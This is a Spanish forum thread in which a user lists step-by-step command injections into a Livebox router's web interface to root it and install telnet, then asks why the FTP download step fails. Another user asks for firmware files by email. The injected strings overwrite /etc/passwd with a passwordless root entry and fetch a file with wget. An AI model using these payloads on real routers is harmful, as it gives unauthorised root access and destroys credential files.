BandaAncha.eu

  • 🔍 en 📰 artículos ⏎
  • 🔍 en 💬 foros ⏎
  • 🔍 en 👇 este 💬 foro ⏎
  • 🔍 en 👇 este 💬 tema ⏎
Regístrate Regístrate Identifícate Identifícate
ADSL

livebox firmware v5.03.2-sp

BocaDePez
BocaDePez

Buenas

Tras multiples preubas y mucho tiempo invertido en intentar instalar el servidor de telnet en el router livebox, me he dado por vencido.
El problema que tengo es que el router no llega a conectarse a mi pc via FTP.En el log del SERVER FTP no se llega hacer ninguna peticion por parte del router.Enumero los pasos que he seguido:

1º he creado una conexión de red con el cable USB.

2º he asignado a mi ordenador la ip 10.0.0.2, mascara de subred 255.255.0.0 y puerta de enlace 10.0.0.1

3º accedo al liveBox a través del explorer: http://10.0.0.1

4º En la página de inicio, en el cuadro de usuario, tecleo:

;echo root::0:0:root:/root:/bin/sh >/etc/passwd

y dejo en blanco el cuadro de contraseña.

5º En Configuracion->Avazada->Red, ya tengo LAN IP en 10.0.0.1,y deselecionada la opción 'Enable DHCP Server'. (por tanto lo dejo como está)

6º En la página de inicio, en el cuadro de usuario y en el cuadro constraseña, pongo los datos que me ha proporcionado mi actual ISP (ya.com)

7º En Configuracion->Avanzada->Inalambrico pongo:

;cd /etc;wget ftp://10.0.0.2/u

Es aqui en el paso 7 cuando pasa lo comentado arriba.Creo que el problema va a estar en que no me esta cogiendo el comando para acceder como root y por lo tanto , todo lo demas no funciona.
No se a ver si a alguien le ha pasado lo mismo y me puede dar un poquito de luz.

Gracias

Este tema está cerrado a nuevas respuestas. Abre un nuevo tema para retomar la conversación.
errichal

Alguien me puede enviar a mi correo la version de firmware
5.3.3 fr o la 5.0 .Gracias

erdeleganes@gmail.com

He intentado bajarmela del emule , pero no la tiene nadie compartida , ninguna de las dos.

Gracias